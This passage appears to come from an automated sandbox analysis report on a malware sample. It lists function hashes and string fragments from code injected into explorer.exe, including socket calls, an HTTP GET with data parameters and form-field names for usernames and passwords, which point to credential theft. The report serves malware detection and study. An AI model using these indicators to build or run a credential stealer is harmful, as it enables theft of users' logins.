                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 658b5992820860b1feeb3b6ba08bcabf5d4dda05214f7b35ff18e914790ad044
                                                          • Instruction ID: 0de96d6fb0d394952ee16c22b9c5b633c0496d7919e280cf07e0675c11cafa43
                                                          • Opcode Fuzzy Hash: 658b5992820860b1feeb3b6ba08bcabf5d4dda05214f7b35ff18e914790ad044
                                                          • Instruction Fuzzy Hash: E2514F716002096AEF209BA9DC85FEE77ACEF2431DF1800AFD609972B0D770AE458F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: eba8f5d6e3168c021f42cc94aa28e5acc31717569ba02a3022892ddd7e37c3e9
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: 73022371508342AFD306DF59C890A6FBBE5FFD8700F04892DB9998B2A4DB31E945CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: b632b0a6adb3ea7718f487897bfcf05c7f871ba78d0ecaad227d02c259121db0
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 9081B070E052499EEF258E6CC8917FFBBB2EF45320F18425BD965A73B1C73498418B62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 18dbf8c60742dfc6e47f085a92ec637a77eae24f4303c76a78117aa10ef2fd75
                                                          • Instruction ID: 0e02a39545ffecd93b09fe65c7836643dda50c4aa7e0da777a578e8840d15fd2
                                                          • Opcode Fuzzy Hash: 18dbf8c60742dfc6e47f085a92ec637a77eae24f4303c76a78117aa10ef2fd75
                                                          • Instruction Fuzzy Hash: 5421717AA00119ABDB10DF69D844EFFBBFCAF54640F44011BE905E3210E670DA058BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014A02E7
                                                          • RTL: Re-Waiting, xrefs: 014A031E
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014A02BD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: a141308ac94aa716cdc3718fdeb93a449169555b3c21d7310d5fcdb86abf3a04
                                                          • Instruction ID: 8cad1b06c37e884505089bd6a6608a40256f7eb96c1ff73232e50110338955ff
                                                          • Opcode Fuzzy Hash: a141308ac94aa716cdc3718fdeb93a449169555b3c21d7310d5fcdb86abf3a04
                                                          • Instruction Fuzzy Hash: C7E1AE316047419FD765CF28C884B6ABBE0BB94314F140A1EF9A58B3F2D774E949CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 014A7B7F
                                                          • RTL: Resource at %p, xrefs: 014A7B8E
                                                          • RTL: Re-Waiting, xrefs: 014A7BAC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 86b9f8f65fe0fc36fd2471dd8bdefb9a00fcf865210d5f0ffa36519092cd248f
                                                          • Instruction ID: 8098bf4d2376aa7feb6b865dd596cd5333629dd790d9debacb249f2d22a2bc7e
                                                          • Opcode Fuzzy Hash: 86b9f8f65fe0fc36fd2471dd8bdefb9a00fcf865210d5f0ffa36519092cd248f
                                                          • Instruction Fuzzy Hash: 5341E4313007028FD725DE29CC50B67B7E9EBA8715F100A2EE95ADB7A0D772E4058B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 014A7294
                                                          • RTL: Resource at %p, xrefs: 014A72A3
                                                          • RTL: Re-Waiting, xrefs: 014A72C1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: 9430755ea84dd8c8a89f0f9157924ec3670f68554c9f48e21dd8257326cb70ff
                                                          • Instruction ID: d6dc357a8fd7aadce4f936222de9164d08c04d73f7e25140bcd7bcad520f63aa
                                                          • Opcode Fuzzy Hash: 9430755ea84dd8c8a89f0f9157924ec3670f68554c9f48e21dd8257326cb70ff
                                                          • Instruction Fuzzy Hash: 7941D232700602ABD721DF29CC41BA6B7A5FB64715F11462AF955DB3A0DB32F80687D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: e72c9f5af8259b93b9def687ce6a3ac480517631eaee5f02de16d5959d7a7290
                                                          • Instruction ID: 26371d1b38e5e75227a3748b61f8b4a7278a473e326f7252094a0ff87e44c63a
                                                          • Opcode Fuzzy Hash: e72c9f5af8259b93b9def687ce6a3ac480517631eaee5f02de16d5959d7a7290
                                                          • Instruction Fuzzy Hash: 34317372A002299EDB60DF39CC44FEFB7FCAB54611F44055BE949E3210EB709A448FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: b5db85abc816f23bb0c7b064544c893a9464baf8e79fb63136f2e398f799d503
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: 3C91D270E002069BEB24CF6DC998AFFBBA5EF44322F94491BE955E73E0D73089418B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 1a61b73829c44a634ac05a5315170fab54325c0a1b66ba0028b272789535a402
                                                          • Instruction ID: 9a4491055c70d8de794fc40fe949290fd97c223e611bce3e6f49e5b98b109bdb
                                                          • Opcode Fuzzy Hash: 1a61b73829c44a634ac05a5315170fab54325c0a1b66ba0028b272789535a402
                                                          • Instruction Fuzzy Hash: 3F810A76D002699BEB318F54CC44BEABBB4AB58714F0441DBEA19B7290D7709E85CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:2.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.7%
                                                          Total number of Nodes:444
                                                          Total number of Limit Nodes:16
13986->13987 13988 e4cb2cb 13986->13988 13987->13985 13988->13987 13989 e4cb0c2 6 API calls 13988->13989 13989->13987

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: getaddrinforecvsetsockopt
                                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                          • API String ID: 1564272048-1117930895
                                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                          • Instruction ID: d452e772a89f6eb690da3c3d601a8658d44c85046dac260d47aa787de06aa694
                                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                          • Instruction Fuzzy Hash: 18527134618A088FCB69EF68C4947EAB7E2FB54300F50492FC49FC7246DE74A949CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: `
                                                          • API String ID: 823142352-2679148245
                                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                          • Instruction ID: 21560dea2b9888fad5ebf305b3540fcc749c48c1004ed6946036e8df7e5520c6
                                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                          • Instruction Fuzzy Hash: F8222B74A18A099FDB99DF68C4956BAF7E1FB98301F40462FD45ED3250DB30E852CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0E4CFE67
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                          • Instruction ID: 89b20b7156a545d3795d64618acb533545a4ee65c5814ca61a7c7d44d88e0ef1
                                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                          • Instruction Fuzzy Hash: 1B015E34668B484F9B88EF6C948522AB7E4FBD9215F000B3FE99AC7254EB64D9414742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0E4CFE67
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                          • Instruction ID: b48b3caff63106467bed48426664a5aae53c3d754ae18cb50172ca33536b50fd
                                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                          • Instruction Fuzzy Hash: 1F01A734628B884B8784EB2C94412A6B3E5FBCE314F000B3FE59AC3241DB25D5014782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • ObtainUserAgentString.URLMON ref: 0E4C99A0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: AgentObtainStringUser
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 2681117516-319646191
                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction ID: 717ac263c5c318000c8120785141aed8195ee74c71207b4cd95240c660fd413e
                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction Fuzzy Hash: CE31BC31714A0C8BCB55EFA9C8947EEB7E1FB98205F40062FD44ED7240DF788A49878A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • ObtainUserAgentString.URLMON ref: 0E4C99A0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: AgentObtainStringUser
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 2681117516-319646191
                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction ID: 542fb69d40a3c6bd7598c6b16776294eac297929ca4c56dfefc10e440112aa2e
                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction Fuzzy Hash: F921B130614A0C9BCB55EFA9C8947EEBBE1FB58205F40461FD45AD7240DF788A09878A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateMutex
                                                          • String ID: .dll$el32$kern
                                                          • API String ID: 1964310414-1222553051
                                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                          • Instruction ID: b4d74b1b3250327a7a2797509146e07fce6c184702deaacfdd13349d2a68f0c9
                                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                          • Instruction Fuzzy Hash: AB418B74918A088FCB94EFA8C8947AD77E1FBA8300F04067FC84ADB255EE349945CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateMutex
                                                          • String ID: .dll$el32$kern
                                                          • API String ID: 1964310414-1222553051
                                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                          • Instruction ID: 17155b5a4d7b0fb8391ff0bfe03b054eeb656190247000417e2c8cb39a7690d3
                                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                          • Instruction Fuzzy Hash: 8A413974918A088FDB84EFA8C498BAD77F1FBA8300F44456FC84EDB256DE349945CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: connect
                                                          • String ID: conn$ect
                                                          • API String ID: 1959786783-716201944
                                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                          • Instruction ID: 6314cb66a2c360bde88dca5e86162815cbba190fa490c4fa34db4d47464b078f
                                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                          • Instruction Fuzzy Hash: B2014834618B188FCB84EF1CE088B55B7E0EB58324F1545AEA90DCB226CA74C8818BC2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: connect
                                                          • String ID: conn$ect
                                                          • API String ID: 1959786783-716201944
                                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                          • Instruction ID: 71dd9b212a96d9ff0b8ac0f8ccc369631667dedca6d1872d81114ea607c926bd
                                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                          • Instruction Fuzzy Hash: AF011A70618A1C8FCBC4EF5CA088B55B7E0EB59315F1545AEA80DCB226CA74C9818BC2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: send
                                                          • API String ID: 2809346765-2809346765
                                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                          • Instruction ID: 6a3b2a3f93b86adcd1f25e3195d07b0bd95294c7d7d24f74b62d9f9aa067f533
                                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                          • Instruction Fuzzy Hash: A8011270518A188FDBC4EF5CE089B2577E0EB58314F1545AED85DCB266C670DC818B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Basic blocks: 416 e4cb5b2-e4cb5ea; 417 e4cb5ec-e4cb604 (call e4ce942); 418 e4cb60a-e4cb62b (socket)
                                                          • Edges: 416->417; 416->418; 417->418
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: sock
                                                          • API String ID: 98920635-2415254727
                                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                          • Instruction ID: 7855e4a98b86a9c96fe938039e8a57c1c11d63747216636b242d384934d2a1cf
                                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                          • Instruction Fuzzy Hash: A5012C70618A188FCB84EF1CE048B55BBE0FB59314F1545AEE85ECB266C7B0C9818B86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Basic blocks:
                                                          • 421 e4c32dd-e4c3320 (call e4ce942)
                                                          • 424 e4c33fa-e4c340e
                                                          • 425 e4c3326
                                                          • 426 e4c3328-e4c3339 (SleepEx)
                                                          • 427 e4c333b-e4c3341
                                                          • 428 e4c334b-e4c3352
                                                          • 429 e4c3343-e4c3349
                                                          • 430 e4c335c-e4c336a (call e4cdf12)
                                                          • 431 e4c3354-e4c335a
                                                          • 432 e4c3370-e4c3376
                                                          • 434 e4c3378-e4c337e
                                                          • 435 e4c33b7-e4c33bd
                                                          • 436 e4c33bf-e4c33cf (call e4c3e72)
                                                          • 437 e4c33d4-e4c33db
                                                          • 439 e4c3380-e4c338a
                                                          • 441 e4c33e1-e4c33f5 (call e4c30f2)
                                                          • 442 e4c338c-e4c33b1 (call e4c4432)
                                                          • Edges: 421->424; 421->425; 425->426; 426->426; 426->427; 427->428; 427->429; 428->431; 428->432; 429->428; 429->430; 430->432; 431->430; 431->432; 432->434; 432->435; 434->435; 434->439; 435->436; 435->437; 436->437; 437->426; 437->441; 439->435; 439->442; 441->426; 442->435
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                          • Instruction ID: bb35596d3204788152994ff41683db90e212c7ad7d916577f564bc723541c8f0
                                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                          • Instruction Fuzzy Hash: 42316D78614B09DFDBA4EF2A80482A6B7A1FB54300F4486BFC92DCB216CB749855CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Basic blocks: 457 e4c3412-e4c3446 (call e4ce942); 460 e4c3448-e4c3472 (call e4d0c9e, CreateThread); 461 e4c3473-e4c347d
                                                          • Edges: 457->460; 457->461
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                          • Instruction ID: 57c7a471f2d22266409abc976dbe787671c29522005f6a210662c8d02b7c7e57
                                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                          • Instruction Fuzzy Hash: C5F0F634268A484FD7C8EF2CD44563AF3D0FBE9215F444A3FA54DC3264DA39C9818756
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                          • API String ID: 0-393284711
                                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                          • Instruction ID: 3b3efd4bc629a796d962d1129455ed7a82b6295a199b3d6ce91698894659a12e
                                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                          • Instruction Fuzzy Hash: 10E16A74618F488FC7A5DF68C5857AAB7E0FB68300F804A2EA59BC7241DF34E541CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                          • API String ID: 0-2916316912
                                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                          • Instruction ID: 8c1fddba2f516d3169dad8a05583fcfddd7e46602844e6ecdc50399b10decab6
                                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                          • Instruction Fuzzy Hash: EAB16C30618B488EDB55EF688485AEEB7F1FF68300F50491EE49AC7251EF74E505CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                          • API String ID: 0-1539916866
                                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                          • Instruction ID: 19bd8555c7210ce0b42f12aa4006e4c2fd41e90f7bf9b0b4d084f96ba86503bf
                                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                          • Instruction Fuzzy Hash: 8741AE70A1CB088FDB14DF88A5467AE7BE2FB98700F40025EE809D3245DBB5ED458BD6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                          • API String ID: 0-355182820
